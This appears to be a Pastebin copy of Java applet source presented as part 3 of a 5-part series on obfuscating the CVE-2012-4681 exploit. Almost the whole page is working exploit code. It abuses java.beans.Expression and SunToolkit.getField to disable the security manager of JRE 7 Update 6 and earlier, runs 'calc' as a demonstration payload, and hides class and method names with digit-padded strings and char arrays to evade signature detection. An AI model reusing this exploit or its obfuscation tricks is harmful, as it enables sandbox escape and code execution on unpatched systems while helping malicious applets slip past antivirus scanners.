SHARE
TWEET

Java 7 Exploit CVE-2012-4681 obfuscation pt. 3/5

SecurityObscurity Nov 15th, 2012 775 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  *  Java 7 Exploit CVE-2012-4681 obfuscation pt. 3/5
  3.  *  
  4.  *  Affected product versions:
  5.  *  - JDK and JRE 7 Update 6 and before
  6.  *
  7.  * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
  8.  */
  9. import java.applet.Applet;
  10. import java.awt.Graphics;
  11. import java.beans.Expression;
  12. import java.beans.Statement;
  13. import java.lang.reflect.Field;
  14. import java.net.URL;
  15. import java.security.*;
  16. import java.security.cert.Certificate;
  17. import java.lang.reflect.Constructor;
  18. import java.lang.reflect.Method;
  19.  
  20. public class Java extends Applet
  21. {
  22.     String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
  23.     char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
  24.     char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
  25.     String   ad = "or",me = "me", aw = "f", kl = "Na"; // forName
  26.     String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
  27.  
  28.     public void enableSecurity() throws Throwable
  29.     {
  30.         Object ao[] = new Object[2];
  31.         ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
  32.         ao[1] = "a"+"c"+"c";
  33.        
  34.         Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
  35.         e.execute();
  36.         Field field = (Field)e.getValue();
  37.  
  38.  
  39.         Permissions pe = new Permissions();
  40.         pe.add(new AllPermission());
  41.        
  42.         CodeSource cs = new CodeSource(new URL(new String(file)), new Certificate[0]);
  43.         ProtectionDomain pd = new ProtectionDomain(cs, pe);
  44.        
  45.         AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
  46.        
  47.         Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
  48.         field.set(stat, ac);
  49.         stat.execute();
  50.     }
  51.  
  52.     public void init()
  53.     {
  54.         try
  55.         {
  56.             enableSecurity();
  57.             Runtime.getRuntime().exec("calc");
  58.         }
  59.         catch(Throwable t){}
  60.     }
  61.    
  62.     private Class GimmeClass(String ps) throws Throwable
  63.     {
  64.         Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
  65.         le.execute();
  66.         return (Class)le.getValue();
  67.     }    
  68. }
RAW Paste Data
Top